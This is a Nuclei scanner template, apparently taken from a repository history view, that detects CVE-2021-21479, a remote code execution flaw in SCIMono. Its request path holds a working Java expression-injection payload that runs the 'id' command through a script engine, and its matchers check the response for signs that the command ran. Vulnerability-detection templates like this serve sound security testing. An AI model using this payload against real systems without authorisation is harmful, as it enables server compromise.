2021-07-18 04:11:56 +00:00
|
|
|
id: CVE-2021-21479
|
|
|
|
|
|
|
|
info:
|
|
|
|
name: SCIMono < v0.0.19 Remote Code Execution
|
|
|
|
author: dwisiswant0
|
|
|
|
severity: critical
|
|
|
|
reference: https://securitylab.github.com/advisories/GHSL-2020-227-scimono-ssti/
|
|
|
|
description: |
|
|
|
|
In SCIMono before 0.0.19, it is possible for an attacker to inject and
|
|
|
|
execute java expression compromising the availability and integrity of the system.
|
|
|
|
tags: cve,cve2021,scim,rce
|
|
|
|
|
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/Schemas/$%7B''.class.forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('js').eval('java.lang.Runtime.getRuntime().exec(\"id\")')%7D"
|
2021-07-18 17:24:34 +00:00
|
|
|
|
2021-07-18 04:11:56 +00:00
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
words:
|
|
|
|
- "The attribute value"
|
|
|
|
- "java.lang.UNIXProcess@"
|
|
|
|
- "has invalid value!"
|
|
|
|
part: body
|
|
|
|
condition: and
|